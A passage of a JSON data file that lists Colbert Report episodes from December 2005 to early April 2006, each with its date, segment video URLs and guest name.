        "http://thecolbertreport.cc.com/videos/0yxnmj/intro---12-5-05",
        "http://thecolbertreport.cc.com/videos/utqsnp/kennedy-center-honors",
        "http://thecolbertreport.cc.com/videos/278dqm/the-word---xmas",
        "http://thecolbertreport.cc.com/videos/6ulwwh/apology",
        "http://thecolbertreport.cc.com/videos/sg4wi3/this-week-in-history---december-4th-10th",
        "http://thecolbertreport.cc.com/videos/p01a0h/colbert-nation-citizen-award",
        "http://thecolbertreport.cc.com/videos/djl273/maureen-dowd"
      ],
      "guest": "Maureen Dowd"
    },
    {
      "date": "2005-12-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ad0e3u/intro---12-6-05",
        "http://thecolbertreport.cc.com/videos/l23e5t/the-word---backsies",
        "http://thecolbertreport.cc.com/videos/c6b939/better-know-a-district---virginia-s-8th---jim-moran",
        "http://thecolbertreport.cc.com/videos/bgq83k/fract---the-star-spangled-banner",
        "http://thecolbertreport.cc.com/videos/mjqiqk/anderson-cooper",
        "http://thecolbertreport.cc.com/videos/jo01oi/season-of-giving"
      ],
      "guest": "Anderson Cooper"
    },
    {
      "date": "2005-12-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uvfu4h/intro---12-7-05",
        "http://thecolbertreport.cc.com/videos/k5nni4/burritos-happy-holidays",
        "http://thecolbertreport.cc.com/videos/rmm1zo/the-word---hell--no-",
        "http://thecolbertreport.cc.com/videos/5ti5hp/threatdown---threats",
        "http://thecolbertreport.cc.com/videos/1buius/craig-crawford"
      ],
      "guest": "Craig Crawford"
    },
    {
      "date": "2005-12-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/muvtpz/intro---12-8-07",
        "http://thecolbertreport.cc.com/videos/zo8qem/the-mallomar",
        "http://thecolbertreport.cc.com/videos/9zltfz/the-word---satisfied-",
        "http://thecolbertreport.cc.com/videos/zc6wzp/papa-bear-nailed-him",
        "http://thecolbertreport.cc.com/videos/0k58ru/movies-that-are-destroying-america---christmas",
        "http://thecolbertreport.cc.com/videos/f63xob/peggy-noonan",
        "http://thecolbertreport.cc.com/videos/huxiwh/nationwide-secret-santa"
      ],
      "guest": "Peggy Noonan"
    },
    {
      "date": "2005-12-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/26ln5h/intro---12-12-05",
        "http://thecolbertreport.cc.com/videos/th38l3/the-real-christmas",
        "http://thecolbertreport.cc.com/videos/xld8bn/the-word---belly-achin-",
        "http://thecolbertreport.cc.com/videos/4qrc6w/un-american-news---tootsie",
        "http://thecolbertreport.cc.com/videos/gljaa1/fract---war",
        "http://thecolbertreport.cc.com/videos/tos96b/harry-smith",
        "http://thecolbertreport.cc.com/videos/onf96q/the-in-box---custom-stamps"
      ],
      "guest": "Harry Smith"
    },
    {
      "date": "2005-12-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hh6w14/intro---12-13-05",
        "http://thecolbertreport.cc.com/videos/f3vpvn/the-de-ballification-of-the-american-sportscape",
        "http://thecolbertreport.cc.com/videos/omscph/the-word---lombardi",
        "http://thecolbertreport.cc.com/videos/53a836/sports-update",
        "http://thecolbertreport.cc.com/videos/reee2h/formidable-opponent---steroids",
        "http://thecolbertreport.cc.com/videos/raw18i/fract---nba",
        "http://thecolbertreport.cc.com/videos/mopfat/bob-costas",
        "http://thecolbertreport.cc.com/videos/97uhmb/sign-off---excellence-in-everything"
      ],
      "guest": "Bob Costas"
    },
    {
      "date": "2005-12-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/irtzij/intro---12-14-05",
        "http://thecolbertreport.cc.com/videos/rxzsfq/king-kong",
        "http://thecolbertreport.cc.com/videos/g7vs24/the-word---travolta",
        "http://thecolbertreport.cc.com/videos/j8pyop/tip-wag---redefining-cruel-and-unusual",
        "http://thecolbertreport.cc.com/videos/po8ta2/dermot-mulroney",
        "http://thecolbertreport.cc.com/videos/nf6l8d/sign-off---three-stockings"
      ],
      "guest": "Dermot Mulroney"
    },
    {
      "date": "2005-12-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/12ie90/intro---12-15-05",
        "http://thecolbertreport.cc.com/videos/7x2gjd/war-on-holiday",
        "http://thecolbertreport.cc.com/videos/1286w8/the-word---jetpack",
        "http://thecolbertreport.cc.com/videos/4epy8c/better-know-a-district---new-york-s-11th---major-owens",
        "http://thecolbertreport.cc.com/videos/gn64jt/mark-cuban",
        "http://thecolbertreport.cc.com/videos/9d08kf/tax-deductions"
      ],
      "guest": "Mark Cuban"
    }
  ],
  "2006": [
    {
      "date": "2006-01-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ccm8j9/intro---1-9-2006",
        "http://thecolbertreport.cc.com/videos/gfhklq/merry-christmas",
        "http://thecolbertreport.cc.com/videos/k2b0t4/going-at-it",
        "http://thecolbertreport.cc.com/videos/tfsnjk/the-lusk-alito-connection",
        "http://thecolbertreport.cc.com/videos/zvszwh/the-word---there-is-no-word",
        "http://thecolbertreport.cc.com/videos/wm808s/tip-wag---addicted-to-cute",
        "http://thecolbertreport.cc.com/videos/fx17nm/fract---columbus",
        "http://thecolbertreport.cc.com/videos/nctzb0/nancy-grace",
        "http://thecolbertreport.cc.com/videos/vt9veh/on-notice-dead-to-me---word-of-the-year"
      ],
      "guest": "Nancy Grace"
    },
    {
      "date": "2006-01-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zffhux/intro---1-10-02",
        "http://thecolbertreport.cc.com/videos/znlsxv/off-notice---the-e-street-band",
        "http://thecolbertreport.cc.com/videos/jz3vjq/the-word---sleeper-cell",
        "http://thecolbertreport.cc.com/videos/fzr3d5/balls-for-kidz---bear-hunting",
        "http://thecolbertreport.cc.com/videos/uk2dty/carl-bernstein",
        "http://thecolbertreport.cc.com/videos/lppcfe/the-in-box---taking-a-bullet"
      ],
      "guest": "Carl Bernstein"
    },
    {
      "date": "2006-01-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yq13d1/intro---1-11-06",
        "http://thecolbertreport.cc.com/videos/kci614/colbert-report-consumer-alert",
        "http://thecolbertreport.cc.com/videos/ho8xgd/alito-haters",
        "http://thecolbertreport.cc.com/videos/vko8sm/the-word---whatever",
        "http://thecolbertreport.cc.com/videos/bbh162/threatdown---fathers-and-sons",
        "http://thecolbertreport.cc.com/videos/o71qa3/fract---colbert-trivia",
        "http://thecolbertreport.cc.com/videos/4z25yz/john-stossel",
        "http://thecolbertreport.cc.com/videos/gsuxni/sign-off---future-money"
      ],
      "guest": "John Stossel"
    },
    {
      "date": "2006-01-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vkw0ea/intro---1-12-06",
        "http://thecolbertreport.cc.com/videos/smz33e/the-oscars",
        "http://thecolbertreport.cc.com/videos/hldbza/the-word---double-stick-tape",
        "http://thecolbertreport.cc.com/videos/ycx56p/better-know-a-district---new-jersey-s-9th---steven-rothman",
        "http://thecolbertreport.cc.com/videos/4huh6w/fract---frnap--monarchy",
        "http://thecolbertreport.cc.com/videos/2qbk3w/kenneth-miller",
        "http://thecolbertreport.cc.com/videos/393ez5/michael-adams--apology"
      ],
      "guest": "Ken Miller"
    },
    {
      "date": "2006-01-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hk33gu/intro---1-16-06",
        "http://thecolbertreport.cc.com/videos/sfiw6u/martin-luther-king-jr--day",
        "http://thecolbertreport.cc.com/videos/a3wcdf/the-word---cerrado-",
        "http://thecolbertreport.cc.com/videos/7te5id/movies-that-are-destroying-america---transamerica",
        "http://thecolbertreport.cc.com/videos/2zgm7q/fract---captain-north-korea",
        "http://thecolbertreport.cc.com/videos/39qjdh/george-stephanopoulos",
        "http://thecolbertreport.cc.com/videos/1jvqfi/sign-off---i-have-a-dreamsicle"
      ],
      "guest": "George Stephanopoulos"
    },
    {
      "date": "2006-01-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/btjtm2/intro---1-17-2006",
        "http://thecolbertreport.cc.com/videos/uhh2bv/the-golden-globes",
        "http://thecolbertreport.cc.com/videos/lqd06o/age-defying-pancakes",
        "http://thecolbertreport.cc.com/videos/pxy8xm/the-word---old-school",
        "http://thecolbertreport.cc.com/videos/3wpryl/tip-wag---eminem",
        "http://thecolbertreport.cc.com/videos/l2yoxp/andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/lpdbmt/wilford-brimley-calls---oatmeal"
      ],
      "guest": "Andrew Sullivan"
    },
    {
      "date": "2006-01-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nh5ji3/intro---1-18-06",
        "http://thecolbertreport.cc.com/videos/z3vrpl/the-de-edumacation-of-the-american-brainscape",
        "http://thecolbertreport.cc.com/videos/ti5lsj/the-word---smarterer",
        "http://thecolbertreport.cc.com/videos/92rf9j/bring--em-back-or-leave--em-dead---teacher-s-edition",
        "http://thecolbertreport.cc.com/videos/rnpcxp/frank-mccourt",
        "http://thecolbertreport.cc.com/videos/86d7fs/sign-off---the-bully-system"
      ],
      "guest": "Frank McCourt"
    },
    {
      "date": "2006-01-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1ibsf9/intro---1-19-06",
        "http://thecolbertreport.cc.com/videos/9s67zo/who-s-attacking-me-now----humane-society",
        "http://thecolbertreport.cc.com/videos/xguuix/the-word---public-see",
        "http://thecolbertreport.cc.com/videos/lidn3n/better-know-a-district---new-york-s-17th---eliot-engel",
        "http://thecolbertreport.cc.com/videos/11mx9e/nina-totenberg",
        "http://thecolbertreport.cc.com/videos/9g8c9i/sign-off---drink-on"
      ],
      "guest": "Nina Totenberg"
    },
    {
      "date": "2006-01-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rnxq1m/intro---1-23-06",
        "http://thecolbertreport.cc.com/videos/k046s8/oprah-s-book-club",
        "http://thecolbertreport.cc.com/videos/ruzjfq/the-word---charlie-daniels",
        "http://thecolbertreport.cc.com/videos/0wj0h7/threatdown---hamas",
        "http://thecolbertreport.cc.com/videos/puj7cw/david-gregory",
        "http://thecolbertreport.cc.com/videos/ipkxy5/dr--love"
      ],
      "guest": "David Gregory"
    },
    {
      "date": "2006-01-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4cxurq/intro---1-24-06",
        "http://thecolbertreport.cc.com/videos/63ywy8/most-depressing-day-of-the-year",
        "http://thecolbertreport.cc.com/videos/xpxm3x/the-word---chernobyl",
        "http://thecolbertreport.cc.com/videos/bpx4o0/formidable-opponent---superpowers",
        "http://thecolbertreport.cc.com/videos/44x8vn/robin-givhan",
        "http://thecolbertreport.cc.com/videos/meshre/the-in-box---dvds"
      ],
      "guest": "Robin Givhan"
    },
    {
      "date": "2006-01-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fcwdw2/intro---1-25-06",
        "http://thecolbertreport.cc.com/videos/sc546i/bill-o-reilly--fan-of-the-show",
        "http://thecolbertreport.cc.com/videos/dg5r31/the-word---remote-control",
        "http://thecolbertreport.cc.com/videos/d7q9f6/better-know-a-district---new-jersey-s-8th---bill-pascrell",
        "http://thecolbertreport.cc.com/videos/e7x760/norah-vincent"
      ],
      "guest": "Norah Vincent"
    },
    {
      "date": "2006-01-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lquo7k/intro---1-26-06",
        "http://thecolbertreport.cc.com/videos/xh484k/thundersnow",
        "http://thecolbertreport.cc.com/videos/qdqpdn/who-s-attacking-me-now----marina-core",
        "http://thecolbertreport.cc.com/videos/9v3sqy/the-word---wham-o",
        "http://thecolbertreport.cc.com/videos/qnlt2s/one-of-the-heroes--lily-s-",
        "http://thecolbertreport.cc.com/videos/lca5rm/colbert-cruise---write-off",
        "http://thecolbertreport.cc.com/videos/gimvpm/paul-begala"
      ],
      "guest": "Paul Begala"
    },
    {
      "date": "2006-01-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fhkpsg/intro---1-30-06",
        "http://thecolbertreport.cc.com/videos/vbdym4/james-frey-s-truthiness",
        "http://thecolbertreport.cc.com/videos/e6nijq/the-word---abortion",
        "http://thecolbertreport.cc.com/videos/5se9xj/tip-wag---google",
        "http://thecolbertreport.cc.com/videos/3f4m4d/annie-duke"
      ],
      "guest": "Annie Duke"
    },
    {
      "date": "2006-01-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2cxabn/intro---1-31-06",
        "http://thecolbertreport.cc.com/videos/d5gebw/the-word---jesi",
        "http://thecolbertreport.cc.com/videos/fo1pme/all-you-need-to-know---samuel-alito",
        "http://thecolbertreport.cc.com/videos/165jzf/fract---the-american-flag",
        "http://thecolbertreport.cc.com/videos/2uduhl/david-maresh",
        "http://thecolbertreport.cc.com/videos/iddejj/sign-off---god-bless",
        "http://thecolbertreport.cc.com/videos/2na088/craziest-f--king-thing-i-ve-ever-heard---snake-and-hamster"
      ],
      "guest": "Dave Marash"
    },
    {
      "date": "2006-02-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dk9yev/intro---2-1-06",
        "http://thecolbertreport.cc.com/videos/y6qr8t/the-american-worker--a-hero-s-salute-to-the-besieged-heroes-of-the-american-jobscape",
        "http://thecolbertreport.cc.com/videos/u7tnek/the-word---you-re-welcome",
        "http://thecolbertreport.cc.com/videos/zfo99j/lieber---minimum-wage",
        "http://thecolbertreport.cc.com/videos/qm6xwf/emily-yoffe",
        "http://thecolbertreport.cc.com/videos/359g3f/sign-off---blue-collar-workday"
      ],
      "guest": "Emily Yoffe"
    },
    {
      "date": "2006-02-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1dag2u/intro---2-2-06",
        "http://thecolbertreport.cc.com/videos/ad4eb4/groundhog-day-forecast",
        "http://thecolbertreport.cc.com/videos/3bftnm/stephen-s-famous-five-meat-chili",
        "http://thecolbertreport.cc.com/videos/xbb82c/the-word---aggravated-assault",
        "http://thecolbertreport.cc.com/videos/lggm23/better-know-a-district---new-york-s-8th---jerrold-nadler",
        "http://thecolbertreport.cc.com/videos/waxwaq/christine-todd-whitman",
        "http://thecolbertreport.cc.com/videos/1q178e/sign-off---tivo"
      ],
      "guest": "Gov. Christine Todd Whitman"
    },
    {
      "date": "2006-02-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dpnfel/intro---2-6-06",
        "http://thecolbertreport.cc.com/videos/x1tmbw/birth-day-off",
        "http://thecolbertreport.cc.com/videos/1gk1h5/the-golden-corner",
        "http://thecolbertreport.cc.com/videos/r9ih4w/the-word---metaphorically",
        "http://thecolbertreport.cc.com/videos/4xxw86/threatdown---killer-bees",
        "http://thecolbertreport.cc.com/videos/kckjlf/fract---native-american-state-names",
        "http://thecolbertreport.cc.com/videos/lynt84/barbara-boxer",
        "http://thecolbertreport.cc.com/videos/xaj1wb/to-be-continued"
      ],
      "guest": "Barbara Boxer"
    },
    {
      "date": "2006-02-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/aa2a90/intro---2-7-06",
        "http://thecolbertreport.cc.com/videos/nzdokc/math-is-hard",
        "http://thecolbertreport.cc.com/videos/iwl7g4/the-word---kidding",
        "http://thecolbertreport.cc.com/videos/pc9syn/fract---frnap--royalty",
        "http://thecolbertreport.cc.com/videos/uvx8kk/james-woolsey",
        "http://thecolbertreport.cc.com/videos/xx0m7n/western-union"
      ],
      "guest": "R. James Woolsey"
    },
    {
      "date": "2006-02-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3vblh5/intro---2-8-06",
        "http://thecolbertreport.cc.com/videos/zmpne2/b-b-b-l-t-",
        "http://thecolbertreport.cc.com/videos/0qolhd/electronic-surveillance",
        "http://thecolbertreport.cc.com/videos/pi8m0r/the-word---eureka",
        "http://thecolbertreport.cc.com/videos/29usyw/better-know-a-district---pennsylvania-s-2nd---chaka-fattah",
        "http://thecolbertreport.cc.com/videos/flyja7/fract---bush-s-height",
        "http://thecolbertreport.cc.com/videos/6jmw8z/alan-dershowitz",
        "http://thecolbertreport.cc.com/videos/96mt5f/the-in-box---terry"
      ],
      "guest": "Alan Dershowitz"
    },
    {
      "date": "2006-02-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/afiwhq/intro---2-9-06",
        "http://thecolbertreport.cc.com/videos/qryfzw/big-brass-balls-award",
        "http://thecolbertreport.cc.com/videos/c00cpa/the-word---u-s-a---u-s-a--",
        "http://thecolbertreport.cc.com/videos/wpi1k4/stephen-s-laws-of-love",
        "http://thecolbertreport.cc.com/videos/8rwy8k/george-packer",
        "http://thecolbertreport.cc.com/videos/33a8tw/charlene--i-m-right-behind-you-"
      ],
      "guest": "George Packer"
    },
    {
      "date": "2006-02-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z5opi6/intro---2-21-06",
        "http://thecolbertreport.cc.com/videos/uo23hp/accidental-shooting",
        "http://thecolbertreport.cc.com/videos/loo817/the-word---u-s-a---u-s-a--",
        "http://thecolbertreport.cc.com/videos/u7vgjy/better-know-a-district---new-jersey-s-13th",
        "http://thecolbertreport.cc.com/videos/gb5q2m/fract---americana",
        "http://thecolbertreport.cc.com/videos/zyrf0h/lama-surya-das",
        "http://thecolbertreport.cc.com/videos/501uix/sign-off---dna"
      ],
      "guest": "Lama Surya Das"
    },
    {
      "date": "2006-02-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i0btk9/intro---2-22-06",
        "http://thecolbertreport.cc.com/videos/9a1fo6/speed-skating-debacle",
        "http://thecolbertreport.cc.com/videos/0g837q/the-word---absolutely-maybe",
        "http://thecolbertreport.cc.com/videos/mvtu98/threatdown---gay-adoption",
        "http://thecolbertreport.cc.com/videos/jkkvih/michael-eric-dyson"
      ],
      "guest": "Michael Eric Dyson"
    },
    {
      "date": "2006-02-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v60d4d/intro---2-23-06",
        "http://thecolbertreport.cc.com/videos/rr6syc/threatdown---bears",
        "http://thecolbertreport.cc.com/videos/754igf/presidential-visions",
        "http://thecolbertreport.cc.com/videos/s0zne3/the-word---hippocratical",
        "http://thecolbertreport.cc.com/videos/kftjaw/pharmaceuticals--prescription-for-progress",
        "http://thecolbertreport.cc.com/videos/rsogzl/david-brooks",
        "http://thecolbertreport.cc.com/videos/azjwel/sign-off---pause-your-tvs"
      ],
      "guest": "David Brooks"
    },
    {
      "date": "2006-02-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/te5not/intro---2-27-06",
        "http://thecolbertreport.cc.com/videos/a6q20s/the-de-deification-of-the-american-faithscape",
        "http://thecolbertreport.cc.com/videos/opnyg5/who-hates-whom-in-the-name-of-god",
        "http://thecolbertreport.cc.com/videos/2hdt17/the-word---trial-separation",
        "http://thecolbertreport.cc.com/videos/5ggers/pick-your-apocalypse",
        "http://thecolbertreport.cc.com/videos/oop06i/tony-campolo",
        "http://thecolbertreport.cc.com/videos/14uaa2/confess-your-sins-to-stephen"
      ],
      "guest": "Tony Campolo"
    },
    {
      "date": "2006-02-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cebyqr/intro---2-28-06",
        "http://thecolbertreport.cc.com/videos/roej3y/who-s-attacking-me-now----anderson-cooper",
        "http://thecolbertreport.cc.com/videos/bdairu/the-word---laissez-les-bons-temps-rouler-",
        "http://thecolbertreport.cc.com/videos/2v3htj/tip-wag---wheeled-transportation",
        "http://thecolbertreport.cc.com/videos/sz96fe/brett-o-donnell"
      ],
      "guest": "Brett O'Donnell"
    },
    {
      "date": "2006-03-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ldd32b/intro---3-1-06",
        "http://thecolbertreport.cc.com/videos/jndc1b/better-know-a-district---california-s-50th",
        "http://thecolbertreport.cc.com/videos/4j8lfp/the-word---faith",
        "http://thecolbertreport.cc.com/videos/1bozfl/better-know-a-founder---benjamin-franklin",
        "http://thecolbertreport.cc.com/videos/11m5ii/arianna-huffington"
      ],
      "guest": "Arianna Huffington"
    },
    {
      "date": "2006-03-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ubq51o/intro---3-2-06",
        "http://thecolbertreport.cc.com/videos/stez1k/the-word---homo-sapien-agenda",
        "http://thecolbertreport.cc.com/videos/3k2tf6/the-dacolbert-code---the-oscars",
        "http://thecolbertreport.cc.com/videos/gltobj/jeffrey-sachs",
        "http://thecolbertreport.cc.com/videos/wx4nw0/sign-off---end-of-an-era"
      ],
      "guest": "Jeffrey Sachs"
    },
    {
      "date": "2006-03-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/404ffy/intro---3-6-06",
        "http://thecolbertreport.cc.com/videos/l42kmx/hollywood-decontamination",
        "http://thecolbertreport.cc.com/videos/tsfsdu/never-say-die",
        "http://thecolbertreport.cc.com/videos/5tdn6m/the-word---spoiler-alert-",
        "http://thecolbertreport.cc.com/videos/tua61a/threatdown---non-blondes",
        "http://thecolbertreport.cc.com/videos/rlta2z/bob-schieffer",
        "http://thecolbertreport.cc.com/videos/iwpji5/sign-off---narnia"
      ],
      "guest": "Bob Schieffer"
    },
    {
      "date": "2006-03-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ca0riz/intro---3-7-06",
        "http://thecolbertreport.cc.com/videos/4cutks/colbert-manor",
        "http://thecolbertreport.cc.com/videos/mtcb44/the-word---the-long-war",
        "http://thecolbertreport.cc.com/videos/g0hyvn/all-you-need-to-know---video-games",
        "http://thecolbertreport.cc.com/videos/8n27zq/norman-ornstein"
      ],
      "guest": "Norman Ornstein"
    },
    {
      "date": "2006-03-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xbwofw/intro---3-8-06",
        "http://thecolbertreport.cc.com/videos/x1smyo/colbert-manor-revisited",
        "http://thecolbertreport.cc.com/videos/to3c41/the-word---monopoly",
        "http://thecolbertreport.cc.com/videos/qhlrjh/stephen-s-sound-advice---civil-war-do-s---don-ts",
        "http://thecolbertreport.cc.com/videos/1ggda8/fract---america-rocks",
        "http://thecolbertreport.cc.com/videos/ovaery/james-webb",
        "http://thecolbertreport.cc.com/videos/vggdk5/used-flag-offer"
      ],
      "guest": "James Webb"
    },
    {
      "date": "2006-03-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vaflyt/intro---3-9-06",
        "http://thecolbertreport.cc.com/videos/dx0yti/canadian-baseball-",
        "http://thecolbertreport.cc.com/videos/6l67tv/the-word---d-i-y-",
        "http://thecolbertreport.cc.com/videos/7oy8db/better-know-a-district---california-s-39th-district---linda-sanchez",
        "http://thecolbertreport.cc.com/videos/15d41c/lorraine-bracco"
      ],
      "guest": "Lorraine Bracco"
    },
    {
      "date": "2006-03-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d7ebhg/intro---3-13-06",
        "http://thecolbertreport.cc.com/videos/lmy7oh/predictions",
        "http://thecolbertreport.cc.com/videos/lykn1c/not-gay",
        "http://thecolbertreport.cc.com/videos/so8v2i/the-word---sidney-poitier",
        "http://thecolbertreport.cc.com/videos/ufh2rw/christopher-buckley",
        "http://thecolbertreport.cc.com/videos/k79bmy/sign-off---mad-magazine"
      ],
      "guest": "Christopher Buckley"
    },
    {
      "date": "2006-03-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9rlemm/intro---3-14-06",
        "http://thecolbertreport.cc.com/videos/i3ouk4/trusting-the-media",
        "http://thecolbertreport.cc.com/videos/i5bwzw/the-word---scapegoat",
        "http://thecolbertreport.cc.com/videos/kiwto1/was-it-really-that-bad----before-unions",
        "http://thecolbertreport.cc.com/videos/402x36/fract---hawaii",
        "http://thecolbertreport.cc.com/videos/loh9en/keith-olbermann",
        "http://thecolbertreport.cc.com/videos/8vssl2/hiphopketball-ii--the-rejazzebration-remix--06"
      ],
      "guest": "Keith Olbermann"
    },
    {
      "date": "2006-03-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wt5xpw/intro---3-15-06",
        "http://thecolbertreport.cc.com/videos/u8eaqc/sperm-donor",
        "http://thecolbertreport.cc.com/videos/g4bu6e/the-word---none-of-the-above",
        "http://thecolbertreport.cc.com/videos/kruphn/al-franken",
        "http://thecolbertreport.cc.com/videos/usnoo7/al-franken-fields-calls",
        "http://thecolbertreport.cc.com/videos/z5ir97/craziest-f--king-thing-i-ve-ever-heard---bear-wrestling"
      ],
      "guest": "Al Franken"
    },
    {
      "date": "2006-03-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yna7fv/intro---3-16-06",
        "http://thecolbertreport.cc.com/videos/ecjm4u/who-s-attacking-me-now----commander-coconut",
        "http://thecolbertreport.cc.com/videos/2m2cs5/the-word---sweet-dreams",
        "http://thecolbertreport.cc.com/videos/kgsuha/better-know-a-protectorate---the-virgin-islands---donna-christensen",
        "http://thecolbertreport.cc.com/videos/6o7ym9/frank-vincent",
        "http://thecolbertreport.cc.com/videos/cycayo/sign-off---i-ll-miss-you"
      ],
      "guest": "Frank Vincent"
    },
    {
      "date": "2006-03-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nnadg0/intro---3-20-06",
        "http://thecolbertreport.cc.com/videos/isowuv/movies-that-are-destroying-america---post-oscar-wrap-up",
        "http://thecolbertreport.cc.com/videos/vr4vvt/connie-chung",
        "http://thecolbertreport.cc.com/videos/yuth1j/jessica-simpson-turns-down-gop",
        "http://thecolbertreport.cc.com/videos/6xoiww/war-in-iraq---third-anniversary",
        "http://thecolbertreport.cc.com/videos/b7697r/the-word---stop-it"
      ],
      "guest": "Connie Chung"
    },
    {
      "date": "2006-03-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xvs8w8/intro---3-21-06",
        "http://thecolbertreport.cc.com/videos/zze24r/world-baseball-classic",
        "http://thecolbertreport.cc.com/videos/teon93/the-word---eat-it",
        "http://thecolbertreport.cc.com/videos/eh7h1y/employee-performance-reviews",
        "http://thecolbertreport.cc.com/videos/nbiu6f/steve-kroft",
        "http://thecolbertreport.cc.com/videos/jt1thw/the-in-box---corrections"
      ],
      "guest": "Steve Kroft"
    },
    {
      "date": "2006-03-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/70ntar/intro---3-22-06",
        "http://thecolbertreport.cc.com/videos/nw6pi6/advice-for-jennifer-anniston",
        "http://thecolbertreport.cc.com/videos/gx67le/better-know-a-district---california-s-27th---brad-sherman",
        "http://thecolbertreport.cc.com/videos/c3fb4g/the-word---i-am-the-great-and-powerful-oz",
        "http://thecolbertreport.cc.com/videos/uqd7r1/dan-senor",
        "http://thecolbertreport.cc.com/videos/qay3pj/sign-off---thank-you--america"
      ],
      "guest": "Dan Senor"
    },
    {
      "date": "2006-03-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ou0ql7/intro---3-23-06",
        "http://thecolbertreport.cc.com/videos/rxxsf1/home--hearth--heart-and-heartland---this-land-is-your-land",
        "http://thecolbertreport.cc.com/videos/1q0pl8/miss-manners",
        "http://thecolbertreport.cc.com/videos/jeurtc/stephen-s-sound-advice---how-to-raise-a-hero",
        "http://thecolbertreport.cc.com/videos/3x5mhp/john-kasich",
        "http://thecolbertreport.cc.com/videos/tgvvyb/sign-off---the-reason-for-the-hearth"
      ],
      "guest": "John Kasich"
    },
    {
      "date": "2006-03-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yvu55b/intro---3-27-06",
        "http://thecolbertreport.cc.com/videos/lu2x91/off-the-market",
        "http://thecolbertreport.cc.com/videos/b1jlbx/immigration-protests",
        "http://thecolbertreport.cc.com/videos/hizymr/exercise-routine",
        "http://thecolbertreport.cc.com/videos/fafxll/the-word---tense",
        "http://thecolbertreport.cc.com/videos/jmwqn6/letter-to-the-judge",
        "http://thecolbertreport.cc.com/videos/6zqqyf/threatdown---drug-candy",
        "http://thecolbertreport.cc.com/videos/hx3fbe/fract---bald-eagle",
        "http://thecolbertreport.cc.com/videos/i44o34/gary-hart",
        "http://thecolbertreport.cc.com/videos/bwhjyd/sign-off---tomorrow-s-guest"
      ],
      "guest": "Gary Hart"
    },
    {
      "date": "2006-03-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9tw416/intro---3-28-06",
        "http://thecolbertreport.cc.com/videos/wm4vs8/baby-eagle",
        "http://thecolbertreport.cc.com/videos/4s1h3q/the-word---easter-under-attack---marketing",
        "http://thecolbertreport.cc.com/videos/erxj6i/lieber---school-vouchers",
        "http://thecolbertreport.cc.com/videos/3ejtt4/fract---commemorative-spoons",
        "http://thecolbertreport.cc.com/videos/tyfnef/michael-brown",
        "http://thecolbertreport.cc.com/videos/t4qaaf/sign-off---goodnight--stephen-jr-"
      ],
      "guest": "Michael Brown"
    },
    {
      "date": "2006-03-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4mdlim/intro---3-29-06",
        "http://thecolbertreport.cc.com/videos/r9z4ro/eclipse",
        "http://thecolbertreport.cc.com/videos/mqt5m8/the-word---merrier",
        "http://thecolbertreport.cc.com/videos/3xpeh4/better-know-a-district---california-s-29th---adam-schiff",
        "http://thecolbertreport.cc.com/videos/k1c0hq/bruce-bartlett"
      ],
      "guest": "Bruce Bartlett"
    },
    {
      "date": "2006-03-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uaktnl/intro---3-30-06",
        "http://thecolbertreport.cc.com/videos/89u375/what-jill-carroll-missed",
        "http://thecolbertreport.cc.com/videos/nuwaus/women-s-history-month---soledad-o-brien",
        "http://thecolbertreport.cc.com/videos/smbaky/tip-wag---the-templeton-prize",
        "http://thecolbertreport.cc.com/videos/n7sm3g/fract---drug-testing-standards",
        "http://thecolbertreport.cc.com/videos/b95nrh/robert-greenwald",
        "http://thecolbertreport.cc.com/videos/0vbmc1/million-man-march",
        "http://thecolbertreport.cc.com/videos/zcqswd/the-word---f--k"
      ],
      "guest": "Robert Greenwald"
    },
    {
      "date": "2006-04-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r2tcqv/intro---4-3-06",
        "http://thecolbertreport.cc.com/videos/cckn97/who-s-honoring-me-now----southern-poverty-law-center",
